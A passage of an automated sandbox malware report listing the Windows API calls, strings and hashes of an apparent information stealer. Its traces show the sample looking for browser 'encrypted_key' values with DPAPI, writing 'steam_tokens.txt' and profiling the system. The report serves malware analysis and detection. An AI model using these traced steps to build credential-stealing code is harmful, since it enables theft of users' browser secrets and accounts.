                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00142AF5
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142AFC
                            • RegOpenKeyExA.ADVAPI32(80000002,013EC140,00000000,00020119,00142A79), ref: 00142B1B
                            • RegQueryValueExA.ADVAPI32(00142A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00142B35
                            • RegCloseKey.ADVAPI32(00142A79), ref: 00142B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 64b7c27cadb95ed23859e69a6a4a1dd3f248d49d3ab6bc0a2694b926ebd968df
                            • Instruction ID: 084d5894c22ad2974e950666bd9c39c19075d325ad299da47e369c9c06623709
                            • Opcode Fuzzy Hash: 64b7c27cadb95ed23859e69a6a4a1dd3f248d49d3ab6bc0a2694b926ebd968df
                            • Instruction Fuzzy Hash: B201B175A00314ABD311CFA0DC59FAB7BBCEB48716F100099FE45972A0EB3059448790
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00142A65
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142A6C
                              • Part of subcall function 00142AE0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00142AF5
                              • Part of subcall function 00142AE0: RtlAllocateHeap.NTDLL(00000000), ref: 00142AFC
                              • Part of subcall function 00142AE0: RegOpenKeyExA.ADVAPI32(80000002,013EC140,00000000,00020119,00142A79), ref: 00142B1B
                              • Part of subcall function 00142AE0: RegQueryValueExA.ADVAPI32(00142A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00142B35
                              • Part of subcall function 00142AE0: RegCloseKey.ADVAPI32(00142A79), ref: 00142B3F
                            • RegOpenKeyExA.ADVAPI32(80000002,013EC140,00000000,00020119,00139650), ref: 00142AA1
                            • RegQueryValueExA.ADVAPI32(00139650,013FE058,00000000,00000000,00000000,000000FF), ref: 00142ABC
                            • RegCloseKey.ADVAPI32(00139650), ref: 00142AC6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 9cf0f649100aa49b11a56dd3d1987ffbf849bfd473b9a06a5d300d022fece44d
                            • Instruction ID: 14cce082495f358e036eb69c9e8c2dd56460523dce14aea5d796da13705993ae
                            • Opcode Fuzzy Hash: 9cf0f649100aa49b11a56dd3d1987ffbf849bfd473b9a06a5d300d022fece44d
                            • Instruction Fuzzy Hash: C201ADB1600308BBDB20DBA4EC49FAA777CEB44316F100595FE08E72A0EA7099448BA0
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 0012723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00127279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00127280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 001272C3
                            • HeapFree.KERNEL32(00000000), ref: 001272CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00127329
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 07e3ec68affea344bd5b27a0b02fe16f9716ca6ed3ed3ce5c8e47c695b3b997e
                            • Instruction ID: 30d83d0f5a21325fedae3ba7563f3cb4b84d63230f9fe1baf73534f742faddf0
                            • Opcode Fuzzy Hash: 07e3ec68affea344bd5b27a0b02fe16f9716ca6ed3ed3ce5c8e47c695b3b997e
                            • Instruction Fuzzy Hash: 4E414B71605716DBDB24CF69EC84BABF3E8FB88315F144569EC49C7390E731E9209A50
                            APIs
                            • memset.MSVCRT ref: 0013D9C6
                            • RegOpenKeyExA.ADVAPI32(80000001,013FD8D8,00000000,00020119,?), ref: 0013D9E5
                            • RegQueryValueExA.ADVAPI32(?,013FE550,00000000,00000000,00000000,000000FF), ref: 0013DA09
                            • RegCloseKey.ADVAPI32(?), ref: 0013DA13
                            • lstrcat.KERNEL32(?,00000000), ref: 0013DA38
                            • lstrcat.KERNEL32(?,013FE490), ref: 0013DA4C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: f6bfcb71c4e49932563ea924a89ff136b4e306f7dc79486f816e2f77e55194da
                            • Instruction ID: 63436970598a846fdc548d0e36d202d3b47b8c8ffaf270ce37f9c54cb8c2616e
                            • Opcode Fuzzy Hash: f6bfcb71c4e49932563ea924a89ff136b4e306f7dc79486f816e2f77e55194da
                            • Instruction Fuzzy Hash: 65415F71A1025CAFCB54EF64FC82BDE7379AF64305F008164B509A7261EF30AA958B91
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00129CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00129CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: 1620f72281fd9c18bded32a153952473c485eceda7dff912e74627ab2302698d
                            • Instruction ID: d6b71e825f21ab4c71711f22606f03a61012c6e96ee28e6a2345b7bf2b287d8e
                            • Opcode Fuzzy Hash: 1620f72281fd9c18bded32a153952473c485eceda7dff912e74627ab2302698d
                            • Instruction Fuzzy Hash: 6541C571A002399BDF21EFA8FC426EE77B4BF65304F044564E919AB252DB30ED25C790
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013EC04
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013EC33
                            • lstrcat.KERNEL32(?,00000000), ref: 0013EC41
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013EC5A
                            • lstrcat.KERNEL32(?,013F9028), ref: 0013EC6D
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013EC7F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 5f081d6b3c00c9ccd37c1619633f7336dea9cfe0cfd7bb17b8b2327d64b478bc
                            • Instruction ID: c0e999fd0120ab1f96f2e27dbbad02c0b34bd3a797d6f80f6ab52e6b5fcb7efb
                            • Opcode Fuzzy Hash: 5f081d6b3c00c9ccd37c1619633f7336dea9cfe0cfd7bb17b8b2327d64b478bc
                            • Instruction Fuzzy Hash: B4419971910229EBCB55EF64EC42BED77B8FF58301F004595FA1597291DF709E848B90
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013EEBF
                            • lstrlen.KERNEL32(00000000), ref: 0013EED6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013EEFD
                            • lstrlen.KERNEL32(00000000), ref: 0013EF04
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0013EF32
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: 4add4671c1c1cff1fed54272576eeb48f391a6547ac0d3599db496fdeaa27a9c
                            • Instruction ID: 19bb25a53a06f0d7868602538615d0b4b61e31d11bf91eda2fed24c749412738
                            • Opcode Fuzzy Hash: 4add4671c1c1cff1fed54272576eeb48f391a6547ac0d3599db496fdeaa27a9c
                            • Instruction Fuzzy Hash: 16318F31A112356BCB22BB78FC4BA5E7BA8AF25305F041130F805DB666DB34DD5587C1
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0012140E), ref: 00129A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0012140E), ref: 00129AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,0012140E), ref: 00129AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,0012140E,00000000,?,?,?,0012140E), ref: 00129AE0
                            • LocalFree.KERNEL32(?,?,?,?,0012140E), ref: 00129B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,0012140E), ref: 00129B07
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 55bfb38233ea44b4e660b34a653e402b0b87b7f23e90731195eff4114bc1cb33
                            • Instruction ID: 3b81d848c7f81011b18b67588234c3a04ea5e8b52b3e2bf14ef69b422773c341
                            • Opcode Fuzzy Hash: 55bfb38233ea44b4e660b34a653e402b0b87b7f23e90731195eff4114bc1cb33
                            • Instruction Fuzzy Hash: 77112E71600329EFEB11DFA9EC88EAF776CEB08745F104259F911A7290EB719D50CBA0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00145D24
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00145D8C
                            • memmove.MSVCRT(00000000,?,?), ref: 00145D99
                            • memmove.MSVCRT(00000000,?,?), ref: 00145DA8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 2af21e84e8b211daf2c8d5a404113bb27c89ff53e54e2fbcf67c667b83540355
                            • Instruction ID: 85df276ef612da2501ef1a31753e00d103a050b56065b59686ddb1018fc5bc67
                            • Opcode Fuzzy Hash: 2af21e84e8b211daf2c8d5a404113bb27c89ff53e54e2fbcf67c667b83540355
                            • Instruction Fuzzy Hash: B6415275B005199FCF18DF6CC895AAEBBB5EF88310F158229E919E7395D7309D018B90
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: a14353f0172241cba201cd654051f0b7f19090a8abff79d2c6d7b1fb1ca8fff4
                            • Instruction ID: 078292d6964a484608e338068b5491c48118542662b5627f321209b67b3e8e30
                            • Opcode Fuzzy Hash: a14353f0172241cba201cd654051f0b7f19090a8abff79d2c6d7b1fb1ca8fff4
                            • Instruction Fuzzy Hash: 7641E5B05047589EDB318B24CD95BFB7BECAF45704F1844E8E98A87192E3719A468F60
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137E98
                              • Part of subcall function 0014A3D0: std::exception::exception.LIBCMT ref: 0014A3E5
                              • Part of subcall function 0014A3D0: std::exception::exception.LIBCMT ref: 0014A40B
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137EB6
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137ED1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: 2da07b1f323dd4edc1631c4bf9d855b124ab78f7b3be79277fe2b5c20463c231
                            • Instruction ID: e19a793794f7e7b01c92612a415c5d71a27d857fd9176bebc1b0f678438bbd5f
                            • Opcode Fuzzy Hash: 2da07b1f323dd4edc1631c4bf9d855b124ab78f7b3be79277fe2b5c20463c231
                            • Instruction Fuzzy Hash: 6821B9723042008FD734DE6CE890A2AB7E9BF91720F204A7DF4658B6D1D771DC458761
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001435BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 001435C6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 001435E1
                            • wsprintfA.USER32 ref: 00143607
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: ee1b8d495491c6681a38699244f3f124c8a7211923f199e099b8247f10c7e3b3
                            • Instruction ID: 257c589e3caf177689d172e84cc51e06504fb1bcd4194f396a701f958b90173d
                            • Opcode Fuzzy Hash: ee1b8d495491c6681a38699244f3f124c8a7211923f199e099b8247f10c7e3b3
                            • Instruction Fuzzy Hash: 6E01B571A44614EBD7049F98DD45B6EB7BCEB44711F000529F915E73A0D774990086A1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlenmemset
                            • String ID:
                            • API String ID: 3212139465-0
                            • Opcode ID: 21c2937e8915e8696e067c5daf27937b763aa47bfc30d6df287147c45c47a289
                            • Instruction ID: 60ce195ec3e206b896fd78dab1eb6463ca4cba6dc511082490a1738508e3a6bf
                            • Opcode Fuzzy Hash: 21c2937e8915e8696e067c5daf27937b763aa47bfc30d6df287147c45c47a289
                            • Instruction Fuzzy Hash: 1B81D3B1E0020A9BDB14CF94DC45BAEBBB5FF94301F54806DE908A73A1EB359D85CB94
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00138071
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001380A0
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 001380E5
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 00138113
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 00138147
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: a84d2aec00c717c252dea5a44e1cdd3ebee80b597ce31d94fe5572a7bedd6b15
                            • Instruction ID: 938c83d9fe4a3cf2c34c3aaf2b9c00674c2c1d1c0524c14b5dad3ced88761370
                            • Opcode Fuzzy Hash: a84d2aec00c717c252dea5a44e1cdd3ebee80b597ce31d94fe5572a7bedd6b15
                            • Instruction Fuzzy Hash: B841A030600216DFDB25DF68D880E9EB7B8FF55301F114199F805DB250EB75EA6ACB91
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 001381FB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013822A
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 00138242
                            • lstrlen.KERNEL32(00000000), ref: 00138280
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001382AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 0bf8a47191dc11b690b71689590bd33b82ce49e82023e4510fe65fa4be115946
                            • Instruction ID: b70c7c89cef074d89e245fdcf6321ed169ada4004062dbbc9b5d206eec8e1c38
                            • Opcode Fuzzy Hash: 0bf8a47191dc11b690b71689590bd33b82ce49e82023e4510fe65fa4be115946
                            • Instruction Fuzzy Hash: B14188316006169FCB22DF68EA84BABBBF8EF44700F158159FC4ADB254EB34D941CB90
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00141D42
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00141A1F
                              • Part of subcall function 001419F0: lstrlen.KERNEL32(013E61B0), ref: 00141A30
